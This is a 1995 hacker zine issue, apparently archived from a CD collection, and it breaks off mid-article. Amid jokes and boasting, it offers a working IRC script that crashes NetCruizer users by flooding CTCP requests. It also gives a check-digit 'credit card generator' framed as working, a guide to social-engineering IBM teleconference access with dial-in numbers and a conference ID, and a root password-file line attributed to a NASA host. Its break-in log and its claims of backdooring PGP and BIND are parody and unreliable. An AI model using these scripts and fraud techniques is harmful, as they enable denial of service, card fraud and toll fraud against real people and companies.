home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / a_m / feh_1.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  53.3 KB  |  1,415 lines

  1.                   FFFFFFF    EEEEEEE     HHH    HHH
  2.                   FFF        EEE         HHH    HHH
  3.                   FFFFFFF    EEEEEE      HHHHHHHHHH
  4.                   FFF        EEEEEE      HHHHHHHHHH
  5.                   FFF        EEE         HHH    HHH
  6.                   FFF        EEEEEEEE    HHH    HHH
  7.                    
  8.                    U          L           A 
  9.                     X          E           X
  10.                      I          E           O
  11.                       N'         T           R
  12.  
  13.                    Issue #1
  14.                             July 1st, 1995
  15.  
  16.                              
  17.               Editor:  ReDragon
  18.  Fuxin' Eleet Haxor of the Month:  Hotrod
  19.   Fuxin' Eleet Haxor Member List:  TOP SECRET
  20.       Official FEH Porn Supplier:  twi
  21. Official passed out drunk of FEH:  y
  22.           Official FEH bartender:  thomas
  23.        Chicago subsidiary of FEH:  l0ck
  24.           Official FEH Historian:  SnoCrash
  25.      Official FEH Warez Supplier:  X
  26.      Official FEH telco security:  Dale Drew 
  27.        Official FEH distribution:  Dark Tangent
  28.          Official Vehicle of FEH:  Saab
  29.             Official Song of FEH:  Thriller
  30.  Official Alcoholic Drink of FEH:  Goldshlager
  31.           Official domain of FEH:  feh.org
  32.        Our current email address:  feh@pussy.org
  33.  
  34.  Greetz To (if we left you out, itz cuz we dont got yer inpho) : 
  35. aky, al, albatross, antichrist, armitage, artimage, baccahbar,
  36. barnasch, basehead, bedlam, blackdeath, blackfire, bluesman, c-curve,
  37. c_cipher, captain ahab, captain hook, ccrider, cerbus, chaos, clovis,
  38. corak, crax, crimelord, crushed puppy, cyntaxera, cyrix, d-fens, datarape,
  39. deathstar, defcon4, deker, digital, discodan, diskjockey, dob, dr. freeze,
  40. dragonlady, drd00m, dreamweaver, drmenace, drunkfux, drwarfare, dupre,
  41. eek, elastic, erikb, eternal, etrigan, excelsior, firefly, fisch, 
  42. frank carson, freiheit, friede, genx, gfm, gheap, ghornet, grayareas,
  43. greylock, greystone, harvard, hellfire, henry, hos, howcum, hypnosis,
  44. interrupt, joybubbles, kc, kewp, kl, kracker, kurupt, leigh, lexicdvl,
  45. liquidice, loq, lordoptic, m0rph, mafiaman, malice, meowmix, mindcrime,
  46. mindscrew, moonchild, mrpurple, mrx, musicphreak, mycroft, nc-17, neophyte,
  47. niaht, nimrod, nitro187, noel, novocain, nyar, nynex, olphart, omega,
  48. opiate, oreo, pandora, paradox, pclord, plant, play, pmf, purpcon, pyro,
  49. qwik, r-a-d, radikahl, radman, rahdude, ratscabies, razor, rebel, redskull,
  50. rhit, roach, scojack, sevenup, silicon, sl, slammer, slpwalker, socket,
  51. solstice, sparhawk, speedrcr, sphice, splice, sserpent, stealth, strauhd,
  52. studload, subzero, swinder, tedbundy, tek, tekone, tele, tewph, tinyz,
  53. totlvizn, tsoul, utahsaint, valgamon, virus, visionary, winter, wozz,
  54. xn4rk, xymox, z1nk, zaphod, zorphix
  55.  
  56.  
  57.                 Ahoy!
  58.       That's how Alexander Graham Bell used to answer his phone.
  59.         For some reason, it never caught on...
  60.  
  61. Well, here it is.  The first issue of FEH, a 'zine in its incarnation already
  62. famous and destined for greatness.  Richard Steele, ex-cia agent, says of
  63. FEH, "my penis is HUGE".  While I'm not sure exactly how this relates to FEH,
  64. he IS ex-cia, so we better publish whatever he says.  Erik Bloodaxe, aka
  65. Chris G., when asked about the prospects of facing a FEH issue against Phrack,
  66. exclaimed "dude, i own you.  i mean, we're all running yer scripts anyhow."  
  67. Grayarea, publisher of, oddly enough, grayareas, wrote about our release,
  68. "spell it Gray Areas."  Perhaps most impressive of all, Emmanuel Goldstein,
  69. when faced with the certain demise of 2600 given FEH's release, commented
  70. "will you leave me alone if i give you a quote?"  And so, without further
  71. adieu, I present to you, FEH #1.
  72.  
  73.  
  74.  
  75. Table of Contents:
  76.  1.  Intro (you've already read that part if you've gotten this far)
  77.  2.  Table of Contents (maximum recursion depth exceeded)
  78.  3.  Editorial by Fuxin' Eleet Haxors
  79.  4.  /var/spool/mail/feh 
  80.  5.  Some C code by Fuxin' Eleet Haxors
  81.  6.  hack logs by Fuxin' Eleet Haxors
  82.  7.  "Just how eleet is FEH" by Rasputin Worldmonger (thats not his real nick)
  83.  8.  "Teleconf stuff" by Morph (ed: this was too complicated, i didnt read it)
  84.  9.  "Ways to amuse yerself" by Rush2 (other than masturbating)
  85. 10.  "The Tack Story" by Hotrod
  86. 11.  "The Birth of FEH" by SnoCrash
  87. 12.  An Interview with Dale Drew [part 1] by ReDragon
  88. 13.  "How to Hack Using Scripts [part 1] by Seven Eleven
  89. 14.  "How to Hack a Toaster Oven" by bl0ke
  90.  
  91. To Submit articles for future issues of FEH (expect it to be released every
  92. month or so), e-mail ReDragon (current address: redragon@chewy.wookie.net),
  93. or contact him through other means (most people know where to find ReD).
  94.    
  95.  
  96.  
  97. // 3.  Editorial
  98.  
  99. Too many people that are in the 'scene' today seem to do nothing but hoarde
  100. things.  Send me this, gimme this seems to be the prevailing attitude of the
  101. day.  If you are going to get on the net and try to hoarde anything, make it
  102. knowledge.  Spend your time learning instead of trying to get toolz out
  103. of people and figuring out who the newest irc chick is.  Sometimes that
  104. means talking to people on irc, but most of the time that means getting out
  105. there and doing it yourself.  Its fine if you want to do the whole social
  106. scene of hacking or phreaking or warez or ansi, they are all different but
  107. in essence, they are all about entertainment on IRC.  But at the heart of
  108. them is a common goal, why which ultimately people are judged.  Which of
  109. these groups have the purest goals?  To have all the warez?  To make the
  110. coolest ansi or demo?  To setup a conf?  No, its knowledge.  And that's
  111. why we are fuxin' eleet hackers.  And that is our ideal.  Now, you may see
  112. us on #hack 24 hours a day, but trust me, we idle a lot, and despite the 
  113. fact that we may be active in the 'social scene' of hacking, it is what we
  114. are doing in another window while the irc screen scrolls that makes us
  115. fuxin' eleet, not what we do on IRC.  
  116.                                         - All the members of FEH
  117.  
  118.  
  119.  
  120. // 4.  /var/spool/mail/feh
  121.  
  122. Someone sent this to one of the FEH members, anonymously, so we dunno
  123. where it came from or who wrote it.  The names were removed to protect
  124. the obviously guilty...
  125.  
  126. Most of the stuff is from my latest performance report.  Prior to that I
  127. worked in the Computer Security Branch as the Virus/Pc expert.  In that
  128. capacity I was responsible for taking care of any and all problems concerning
  129. viruses and P.C.s.  I was taken from a shop where I was doing communications
  130. security due to my extensive knowledge of p.c.s and my decent programming
  131. skills.  They needed someone with some knowledge and foundation in taking
  132. care of Personal Computers.  I established a base line program for dealing
  133. with computer viruses, handling copyright issues and dealing with user 
  134. problems associated with Personal Computers.  We were having some difficulty
  135. with users not being able to distinguish between viruses and program 
  136. gliches due to software problems.  That's where I came in.  O.k. from there
  137. they figured out that I am very good with computers.  They needed someone to
  138. handle Network Security who could do tiger team actions and monitor our 
  139. networks.  They felt due to my computer knowledge I would be the most viable
  140. candidate.  The following is directly from my performance report.
  141.  
  142. "Expert in all aspects of Wide Area Network(WAN) security support.  
  143. Responsible for executing all portions of periodic system security audits 
  144. to find and correct host security vulnerablilities.  Assists HQ USAF Local
  145. Area Network (LAN) systems administrators and customers in implementation of
  146. security safeguards on all UNIX hosts.  Proactively analyzes Network 
  147. Security Monitors (NSM) logs for indications of attempted or successful
  148. intrusions.  Systems administrator for DSST SPARC station platforms."
  149.  
  150. "Heart of the agency's newly established wide area network security program.
  151. Developed and documented procedures for monitoring the HQUSAF backbone.
  152. Security program has led to the most protected network within the DOD 
  153. rated by the Defense Information Systems Security Agency as the best of 9000
  154. systems audited by its elite Center for information Security.
  155. Performs aggressive quarterly security audits of the HQ USAF WAN.
  156. Created software tools and new hacking techniques used by the Air Force 
  157. Information Warfare Center for their on-line surveys of worldwide sites.
  158. Resident expert on UNIX security.
  159. Trained counterparts throughout the agency on our methodology enabling 
  160. them to secure their networks.
  161. Regularly called upon by outside agencies for assistance.
  162. Expertise passed to other system administrators through articles published
  163. in directorate's security newsletter."
  164.  
  165. "leader who has brought the agency's network security program from the 
  166. infancy stage to a mature sustainable program which has Air Force wide
  167. recognition.
  168. Knowledge of UNIX security and leading edge hacking techniques makes him 
  169. a valued source of information thoughout DOD."
  170.  
  171.  
  172.  
  173. // 5. Some C code by Fuxin' Eleet Haxors   
  174.  
  175. fehit.c (we ran this through itself):
  176. /* TH1S W1LL MAK3 Y0UR F1L3S FUX1N' 3L33T */
  177. #1NCLUD3 <STD10.H>
  178. #1NCLUD3 <STR1NGS.H>
  179. #1NCLUD3 <CTYP3.H>
  180.  
  181. MA1N()
  182. {
  183. CHAR L1N3[100];
  184. CHAR C;
  185. 1NT 1;
  186.  
  187. WH1L3(G3TS(L1N3))
  188.   {
  189.     F0R(1=0;L1N3[1];1++)
  190.       {
  191.         L1N3[1]=T0UPP3R(L1N3[1]);
  192.         1F(L1N3[1]=='3')
  193.           L1N3[1]='3';
  194.         1F(L1N3[1]=='1')
  195.           L1N3[1]='1';
  196.         1F(L1N3[1]=='0')
  197.           L1N3[1]='0';
  198.       }
  199.     PUTS(L1N3);
  200.   }
  201. }
  202.  
  203. The world's most fuxin eleet credit card generator (yes it works):
  204. main(){int i,x,n=1,t,s=0;scanf("%d",&i);for(;n<i;n++){scanf("%d",&x);
  205.        t=((n+i%2)%2+1)*x;s+=t+t/10;}printf("%i",(10-s%10)%10);}
  206.  
  207. Some random IRC script that we have no idea where it came from:
  208. # NetCrasher -=- (c) 1995
  209. #   Utilize a nice bug in the NetCruizer IRC client to crash
  210. #   one or many NetCruizer lamers when they are using IRC.
  211. ^assign ctcpstring ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFING
  212. ER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER
  213. ^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
  214. ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AF
  215. INGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFING
  216. ER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER
  217. ^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
  218. ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
  219. ^alias crash eval msg $0 $ctcpstring
  220. alias crashall {
  221.   ^assign TIME 1
  222.   ^assign -DOIT
  223.   on ^raw_irc "% 352 *" {
  224.     ^assign DOIT $DOIT;^timer $TIME crash $7
  225.     ^assign TIME ${TIME+7}
  226.     }
  227.   on ^raw_irc "% 315 *" {
  228.     on raw_irc -"% 352 *"
  229.     on raw_irc -"% 315 *"
  230.     eval $DOIT
  231.     }
  232.   who *.ix.netcom.com
  233.   wait
  234.   echo *** Will crash ${(TIME-1)/7} users...
  235.   echo *** Time required to avoid excess flood: $TIME seconds
  236.   }
  237. ^on ^send_msg "% *^A*^A*^A*^A*^A*" echo *** Crashing NetCruizer lamer: $0
  238. echo *** NetCrasher loaded.  /crash <nick> to crash a single NetCruizer lamer
  239. echo *** /crashall to crash all NetCruizer lamers off IRC (will lag you)
  240. echo *** Note that users crash immediately but do not leave IRC until the
  241. echo *** server gives them a ping timeout.
  242.  
  243. Secure your PC using your joystick to enter your password:
  244. [ed note: whoever wrote this should be shot, unless they have greatly
  245.           grown and only code in C now and anyhow I was only like 13
  246.           when I wrote it so gimme a break, fuck you ed!]
  247.    
  248. {$M 1024,0,1024}
  249. uses dos,crt;
  250. var    TimeTick : procedure;
  251. type   joystickrec = record
  252.     b1 : boolean; b2 : boolean; x  : word;y  : word; end;
  253.   plist = record
  254.      pbyte : byte;   next  : pointer; end;
  255.  
  256. var joy : joystickrec; pass: boolean;isleft: boolean;
  257.   leftit: byte; rightit: byte;pb: byte;i:byte;
  258.    pfile: file of byte;xl,xc,xr : boolean;
  259.     yu,yc,yd : boolean;a,b:pointer;
  260.     pl,pl1: ^plist;
  261.  
  262. procedure brk;
  263. interrupt;
  264. begin
  265. end;
  266.  
  267. procedure readjoystick(var joystick:joystickrec);
  268. var regs: registers;
  269. begin
  270.  
  271.     regs.ah:=$84;
  272.     regs.dx:=$00;
  273.     intr($15,regs);
  274.     if (regs.al AND 16)=0 then joystick.b1:=true else
  275.                            joystick.b1:=false;
  276.     if (regs.al AND 32)=0 then joystick.b2:=true else
  277.                            joystick.b2:=false;
  278.     regs.ah:=$84;
  279.     regs.dx:=$01;
  280.     intr($15,regs);
  281.     joystick.x:=regs.ax;
  282.     joystick.y:=regs.bx;
  283.     xl:=false; xc:=false; xr:=false;
  284.     yu:=false; yc:=false; yd:=false;
  285.     with joystick do begin
  286.     if x<10 then xl:=true;
  287.     if (x>=50) and (x<=150) then xc:=true;
  288.     if (x>150) then xr:=true;
  289.     if (y<10) then yu:=true;
  290.     if (y>50) and (y<100) then yc:=true;
  291.     if (y>100) then yd:=true;
  292. end;
  293. end;
  294. procedure writetf(bol:boolean);
  295. begin
  296. if bol then write('True  ') else write('False ');
  297. end;
  298.  
  299. procedure readfail;
  300. begin
  301. writeln('Verifying Joystick Input....');
  302. writeln('Unable to Verify Password - System Halted');
  303. halt(0);
  304. end;
  305.  
  306. procedure xcenter;
  307. begin
  308. with joy do begin
  309. repeat
  310. readjoystick(joy);
  311. if (not yc) then pass:=false;
  312. until xc or (b1 and b2);
  313. if (b1 and b2) then readfail;
  314. end;
  315. end;
  316.  
  317. procedure ycenter;
  318. begin
  319. with joy do begin
  320. repeat
  321. readjoystick(joy);
  322. if (not xc) then pass:=false;
  323. until yc or (b1 and b2);
  324. if (b1 and b2) then readfail;
  325. end;
  326. end;
  327.  
  328. procedure left;
  329. begin
  330. with joy do begin
  331. repeat
  332. readjoystick(joy);
  333. if (not yc) or (xr) then pass:=false;
  334. until xl or (b1 and b2);
  335. if (b1 and b2) then readfail;
  336. end;
  337. end;
  338.  
  339. procedure right;
  340. begin
  341. with joy do begin
  342. repeat
  343. readjoystick(joy);
  344. if (not yc) or (xl) then pass:=false;
  345. until xr or (b1 and b2);
  346. if (b1 and b2) then readfail;
  347. end;
  348. end;
  349.  
  350. procedure up;
  351. begin
  352. with joy do begin
  353. repeat
  354. readjoystick(joy);
  355. if (not xc) or (yd) then pass:=false;
  356. until yu or (b1 and b2);
  357. if (b1 and b2) then readfail;
  358. end;
  359. end;
  360.  
  361. procedure down;
  362. begin
  363. with joy do begin
  364. repeat
  365. readjoystick(joy);
  366. if (not xc) or (yu) then pass:=false;
  367. until yd or (b1 and b2);
  368. if (b1 and b2) then readfail;
  369. end;
  370. end;
  371.  
  372. procedure press1;
  373. begin
  374. with joy do begin
  375. repeat
  376. readjoystick(joy);
  377. if (b2) then pass:=false;
  378. until b1;
  379. if (b1 and b2) then readfail;
  380. end;
  381. end;
  382.  
  383. procedure press2;
  384. begin
  385. with joy do begin
  386. repeat
  387. readjoystick(joy);
  388. if (b1) then pass:=false;
  389. until b2;
  390. if (b1 and b2) then readfail;
  391. end;
  392. end;
  393.  
  394. procedure nopress1;
  395. begin
  396. with joy do begin
  397. repeat
  398. readjoystick(joy);
  399. if (b2) then pass:=false;
  400. until (not b1);
  401. if (b1 and b2) then readfail;
  402. end;
  403. end;
  404.  
  405. procedure nopress2;
  406. begin
  407. with joy do begin
  408. repeat
  409. readjoystick(joy);
  410. if (b1) then pass:=false;
  411. until (not b2);
  412. if (b1 and b2) then readfail;
  413. end;
  414. end;
  415.  
  416. begin
  417. readjoystick(joy);
  418. Writeln('Joystick Password Verification');
  419. Writeln('------------------------------');
  420. Writeln('Please Input Your Password with the Joystick Now');
  421. Writeln('Press both joystick buttons simultaneously to verify your password.');
  422. getintvec($1b,a);
  423. getintvec($23,b);
  424. setintvec($1b,@brk);
  425. setintvec($23,@brk);
  426. assign(pfile,paramstr(1));
  427. {$I-} reset(pfile); {$I+}
  428. if ioerror<>0 then begin
  429.   writeln('Could Not Read Password - System Halted');
  430.   repeat until 1=0;
  431.   end;
  432. new(pl);
  433. while not eof(pfile) do begin
  434.   read(pfile,pb);
  435.   pl^.pbyte:=pb;
  436.   new(pl1);
  437.   pl^.next:=pl1;
  438.   pl1^.next:=nul;
  439.   pl:=pl1;
  440.   end;
  441. close(pfile);
  442. repeat
  443. pass:=true;
  444. leftit:=0;
  445. isleft:=false;
  446. with joy do
  447. begin
  448. xr:=false;
  449. for i:=1 to 5 do begin
  450.   xcenter;
  451.   left;
  452.   end;
  453. xcenter; right; xcenter; up; ycenter; down; ycenter;
  454. for i:=1 to 5 do begin
  455.   xcenter;
  456.   right;
  457.   end;
  458. xcenter; left; xcenter; up; ycenter; down; ycenter;
  459.  
  460. for i:=1 to 4 do begin press1; nopress1; end;
  461. for i:=1 to 3 do begin press2; nopress2; end;
  462. for i:=1 to 2 do begin press1; nopress1; end;
  463. press2; nopress2;
  464.  
  465. repeat
  466.  readjoystick(joy);
  467. until (b1 and b2);
  468. if (pass) then begin
  469. writeln('Verifying Joystick Input...');
  470. writeln('Password Verified - Continue');
  471. end
  472. end;
  473. if (pass)  then begin
  474.    gotoxy(1,18); writeln('ACCESS DENIED - INCORRECT PASSWORD');
  475.    sound(500); delay(100); nosound; delay(100); sound(500); nosound;
  476.    sound(500); delay(100); nosound; delay(100); sound(500); nosound;
  477.    end;
  478. until pass;
  479. setintvec($1b,a);
  480. setintvec($23,b);
  481. end.
  482.  
  483.  
  484.  
  485. // 6. Fuxin' Eleet Haxor Logs by Hotrod
  486.  
  487. As an offering to the public to prove FEH's obvious superiority to l0ck, 
  488. I decided to demonstrate a n00 h4q t3kn1qu3 recently developed in the FEH 
  489. laboratories, located on a secret island in the Atlantic ocean.
  490.  
  491. The n00 h4q t3kn1qu3 has been demonstrated on wopr.mil, once regarded as 
  492. one of the most secure machines on the net.  This machine alone 
  493. determines whether or not to launch the nuclear missles of the United 
  494. States.  It runs on the US Military's top secret propriatary OS "Lesb/OS".  
  495. Lesb/OS machines are no match for the awesome power of FEH.  
  496.  
  497. FEH proudly offers the following:
  498.  
  499. ---
  500.  
  501. Log start 5/30/95 22:17:36
  502.  
  503. feh.org# uname -a
  504. UNICOS feh 4.3.5 #5 Tue May 30 22:17:36 EDT 1995 T3D
  505. feh.org# whoami
  506. root
  507. feh.org# telnet -safe wopr.mil
  508. Trying 194.33.43.1...
  509. Connected to wopr.mil.
  510. Escape character is '^]'.
  511.  
  512.      Don't even think about haxoring this site, bud.
  513.      Try if you like, you will fail.
  514.      Just don't get caught, or you'll pay the price.
  515.  
  516. wopr login: root
  517. password:             (we tried root)
  518. Login Incorrect
  519.  
  520. wopr login: root
  521. password:             (we tried no password)
  522. Login Incorrect
  523.  
  524. wopr login: root
  525. password:             (we tried pencil)  
  526. Login Incorrect
  527.  
  528. Ok, obviously our traditional hacking methods weren't working out at this
  529. point.  We decided to go for some more sekretive methods...
  530.  
  531. wopr login: lemmein
  532. password: 
  533. Login Incorrect
  534.  
  535. wopr login: iamfeh
  536. password:
  537. Login Incorrect
  538.  
  539. wopr login: HEYASSHOLEIMROOTATFEHORGLEMMEINORYOUREDEAD
  540. password:
  541.  
  542. Welcome to Lesb/OS 2.2.12
  543. Last Login: NEVER
  544.  
  545. News:
  546.  
  547. The Lesb/OS upgrade to 2.2.12 was successful, we apoligize for any 
  548. inconvenience this may have caused.
  549.  
  550. As of 5/28/95 @ 20:34 hours, we have been restored from Defcon 4 to 
  551. Defcon 5.
  552. __
  553.  
  554. You have no mail.
  555.  
  556. wopr> pwd
  557. /home/fehroot
  558. wopr> cd /bin
  559. wopr> ls -al sh
  560. -rwxr-xr-x   2 bin      bin      131072 Feb  3 01:53 sh
  561. wopr> chmod 4755 sh
  562. chmod: sh: not owner.
  563. wopr> ~/look.im.feh.and.if.you.dont.follow.my.orders.youre.fucked
  564. wopr# whoami
  565. root
  566. wopr# ftp
  567. ftp> open feh.org
  568. Connected to feh.org
  569. 220 feh FTP server (UNICOS feh 4.3.5 #5 Tue May 30 22:54:18 EDT 1995 T3D)
  570. ready.
  571. Name (feh.org:root): feh
  572. Password (feh.org:feh): 
  573. 331 Password required for feh.
  574. 230 User feh logged in.
  575. Remote system type is UNIX.
  576. Using binary mode for file transfers.
  577. ftp> lcd /etc
  578. Local directory now /etc
  579. ftp> get fehmotd
  580. 200 PORT command successful.
  581. 150 Opening BINARY mode data connection for fehmotd (1056 bytes).
  582. 226 Transfer complete.
  583. 1056 bytes received in 0.021 secs (49 Kbytes/sec)
  584. ftp> quit
  585. 221 Goodbye.
  586. wopr# cp /etc/fehmotd /etc/motd 
  587. wopr# cat /etc/motd
  588.  
  589. Congratulations, You've Been Haxored by the Best!
  590.  
  591.                            It wasn't LOD......
  592.                            It wasn't l0ck.....
  593.                            It wasn't m0ck.....
  594.                            It wasn't mitnick..
  595.  
  596.                         You've been hacked by
  597.  
  598.                       FFFFFF   EEEEEE   HH   HH
  599.                       FF       EE       HH   HH
  600.                       FFFFF    EEEE     HHHHHHH
  601.                       FF       EE       HH   HH
  602.                       FF       EEEEEE   HH   HH
  603.                        uxin     leet     axors
  604.  
  605. You are likely to go through several stages of emotions at this point.
  606. First, denial, then anger, then acceptance that we are the most fuxin
  607. eleet haxors.  In fact, you better hope we are, cuz if we aren't fuxin
  608. eleet and we still haxored yer system that means that yer a pretty fuxin
  609. shitty sysadmin now, doesn't it?  FEH is roxin' the net, tell all yer
  610. friends we will soon be visiting their site, I hope they will be kind
  611. enough to leave the door as open as you were.
  612. wopr#  
  613. [Subsequently removing any trace of this machine from the net deleted.]
  614.  
  615. Comments:
  616.  
  617. Easier than even we at FEH thought it would be.  We drove the machine into
  618. such fear, that in our presence it gave us root.  Note that we never actually
  619. modified anything, or even ran any new shell, the machine simply 
  620. submitted to our eliteness, and, in a possible attempt to garner mercy at 
  621. our hands, gave us root without making us go through the formalities.
  622.  
  623. Our work remains solid in this wonderful sight:
  624.  
  625. feh.org# whois -h nic.ddn.mil wopr.mil
  626. No match for "WOPR.MIL".
  627.  
  628. Please be advised that this whois server only contains DOD Information.
  629. All INTERNET Domain, IP Network Number, and ASN records are now kept in
  630. the new Internet Registry, RS.INTERNIC.NET (198.41.0.5).
  631. feh.org#
  632.  
  633.  
  634.  
  635. // 7.  Just How Eleet Is FEH by a Fuxin' Eleet Haxor
  636.  
  637.   1 AM A PR0UD M3MB3R 0F FEH.  1 SAY THAT PUBL1CALLY, 1 SAY THAT L0UDLY, 1
  638. SAY THAT STR0NGLY, AND 1 CAN SAY THAT CUZ W3 FUX1N R00L.
  639.   W3 AR3 3L33T.  N0T 0NLY THAT, BUT W3 AR3 3L1T3.  3L33T AND FUXK1NG R0CK1NG.
  640. W3 AR3 S0 C00L THAT W3 HAV3 R3C0NF1GUR3D R0UT3RS T0 AUT0MAT1CALLY G1V3 0UR
  641. PACK3TS H1GH3R PR10R1T13S.  W3 0WN APPR0X1MAT3LY 37% 0F ALL UN1X MACH1N3S 0R
  642. R0UT3RS 0N TH3 1NT3RN3T.  W3 SN1FF C1X, MA3-3AST, TH3 CH1CAG0 NAP, AND C3RT.
  643.   1N SH0RT W3 R0CK.  H0W CAN W3 R0CK TH1S MUCH, Y0U M1GHT ASK?  W3LL, THAT'S
  644. R3ALLY A S1LLY QU3ST10N, AND Y0U'D B3ST N0T ASK 1T, B3CAUS3 W3'V3 SCR1PTS
  645. S3TUP 0N 0UR SN1FF3RS (APPR0X1MAT3LY 4000 MACH1N3S HAV3 AUT0SN1FF3R/F1LT3RS)
  646. THAT W1LL MA1L US THAT Y0U'R3 TALK1NG AB0UT US.
  647.   1N SH0RT - WATCH 0UT.  W3 AR3 TH3 P30PL3 WH0 RUN TH3 N3T.  W3 AR3 TH3 P30PL3
  648. WH0 BACKD00R3D PGP, W3 BACKD00R3D B1ND, W3 BACKD00R3D ARGUS, TCP_WRAPP3RS, AND
  649. 1F Y0U KN3W H0W MANY ST0CK B1NAR13S 1N S0LAR1S, 1R1X, AND A1X W3 HAV3 TR0JAN3D
  650. 1N TH3 C0D3R'S MACH1N3S, Y0U'D SH1T Y0UR PANTS.
  651.   W3 R3C0NF1GUR3D R0UT1NG AT TH3 NAPS AND C1X B3CAUS3 TH3 FAT FUX WH0 RUN TH3
  652. NAPS AR3 T00 FUCK1NG STUP1D AND LAZY T0 D0 1T R1GHT.  1T D1DN'T HURT THAT TH3
  653. PACK3TS TRAV3L 0V3R TH3 SN1FF3R'S 3TH3R, BUT 3V3N W1TH THAT 3XTRA (TRANSPAR3NT)
  654. H0P, W3 1NCR3AS3D 3FF1C13NCY BY 3.2 %.
  655.   BUT TH3 0NLY TH1NG Y0U R3ALLY N33D T0 KN0W 1S THAT W3 AR3 FUCK1NG 3L33T,
  656. W3 AR3 HACK3RS, AND W3 W1LL D0 WHAT W3 WANT.  D0N'T TRY T0 R3S1ST US, W3 W1LL
  657. 0V3RC0M3 ANY S1LLY C3RT ADV1S0R13S Y0U PUT 0UT.  W3 AR3 TH3 0N3S WH0 S3TUP
  658. M1TN1CK'S BUST, B3CAUS3 W3 W3R3 T1R3D 0F H1S S1LLY PR3SS.  W3 AR3 TH3 0N3S
  659. WH0 MA1L3D SH1M0' TH3 L0GS.  W3 AR3 FEH.  W3 AR3 Y0UR FR13ND, UNT1L Y0U M0V3
  660. AGA1NST US.  AND TH3 Y0U W1LL F1ND Y0UR SYST3M, Y0UR T3L3PH0N3, Y0UR B1LLS, Y0U
  661. L1F3, MUCH M0R3 D1FF1CULT.  
  662.   L0V3 FEH - W3 AR3 Y0UR MAST3R, AND W3 AR3 Y0UR 0WN3R.  B3 G00D T0 US, AND W3
  663. W1LL TR3AT Y0U W3LL.  R3B3L AND F33L PA1N.
  664. [FEH] 3VANG3L1ST - RASPUT1N W0RLDM0NG3R
  665.  
  666.  
  667.  
  668. // 8. Something about Teleconferencing Stuff by Morph
  669.  
  670.               An Overview of American Teleconferencing Service,
  671.      ^..^          their relationship to IBM, and TiNets         ^..^
  672.      (oo)  - eye                [Part 1]                         (oo) - me 
  673.     (  . )  phear   researched and compiled by Morpheus         ( .  ) too
  674.      `. '    feh   with thanks to Prophet and also the           ` .'
  675.        .            cooperative employees I spoke with.           . 
  676.      PHEAR                                                      PHEAR
  677.     -=FEH=-    root:Donteventhinkofit:0:1:Operator:/:/bin/csh  -=FEH=-
  678.                             -[*.gsfc.nasa.gov:/etc/passwd]
  679.                              
  680.                         Kopyright (k) Morpheus 1995,
  681.                             all rights reserved.
  682.      [ed note: feel free to steal this and claim it as your own]
  683.  
  684. --------------------------
  685.  Introduction
  686. --------------------------
  687. A Canadian affiliate of CAFBL tipped me off that IBM teleconferences had been
  688. used before through a toll free line. So I investigated how IBM teleconfs are
  689. setup, who makes them with  what software, and how to access IBM conferences.
  690.  
  691. Well I called up IBM's toll-free  information  line  available  from the 800#
  692. index and began a very blunt attempt to socially engineer teleconfs from IBM.
  693. The guy I talked to with told me to work through my  regional  directors, not
  694. through the software information  line, and he gave me the number to American
  695. Teleconferencing  Service,  which  exclusivly handles IBM extrenal teleconfs.
  696. American  is  a  southern  company, located in Tousan, AZ. 
  697.  
  698. This was originally designed  as  a scam article, a step by step guide to the
  699. tricks  and  traps  involved with setting up American Teleconferences through
  700. IBM. Upon  further  consideration, I went back and edited the article to make
  701. it more informational and less "LeT'z HaCk Th0sE FuCkeRz!" I am sure that the
  702. rewording of this  paper  will not make fraudulent use of the information any
  703. less compelling, but I do feel sure that half-assed phreakers would be better
  704. off sticking with old AT&T.
  705. [ed note: 
  706.  i wish he just gave us codes, all this technical stuff makes my head hurt.]
  707.  
  708. --------------------------------------
  709.  A look at an American Teleconfernce
  710. --------------------------------------
  711.  
  712. American Teleconferences conference setup looks like this:
  713.  
  714. ===========================================
  715.  - 6500800 - TiNet Dialin - Accessible to IBM and not you.
  716.  - 7194440800 - External Dialin - Regular Telephone number.
  717.  - 157998 - Conference ID - Use this to access account and conference.
  718. ===========================================
  719.  
  720. Also, American teleconference offers an optional toll free line to dial in to
  721. the conference. This is the only option they offer for external access to the
  722. conferences.  TiNet  works  from probably all IBM phone lines, by dialing 271
  723. followed by the TiNet number.
  724.  
  725. American works on a fairly primitive conferencing system, they simply connect
  726. each line to the other lines as they call in. There is no  conference hub, so
  727. if you're the first caller, you get put on hold until the  next  caller comes
  728. in. The music sucks, i mean, this is really terrible music.
  729. [ed note: you might like the music, some people set these confs up themselves
  730.           just so they can hear the hold music, and nobody ever calls.] 
  731.  
  732. An automated conference conection does not exist, and there is no real access
  733. code  to  enter.  Once  you  dial into the conference, you are greeted by the
  734. operator  who  asks you for you conference ID number and your name. A list of
  735. names can be generated and given to the operator before the conference.
  736.  
  737. ---------------------------
  738.  How American Operates
  739. ---------------------------
  740.  
  741. All  IBM  groups  that  use  American  have  files  in  American's Databases.
  742. Contained in your file  is  your  name,  title, office phone, office address,
  743. which  will also be your billing address, and your department number. This is
  744. an example of  what the file would look like when brought up on their screen:
  745.  
  746. ========================== ============
  747. Name [ Bruce Sterling ] : [ Hi Bruce ]
  748. Dpt  [ # 5176       ] : [  from the last 4 digits of phone number ]
  749. Addr [ 227 Maple Lane ] : [ Office adress / billing adress ]
  750. Addr [ Phila PA 19191 ] : [ Use the closest corp/office ]
  751. Phon [ 512-323-5176   ] : [ Office Numba ]
  752. XXXX [ Billed 1/11/11 (status)   ] : [ Did yew pay your bills? ]
  753. XXXX [ Billed 1/11/11 (status)   ] 
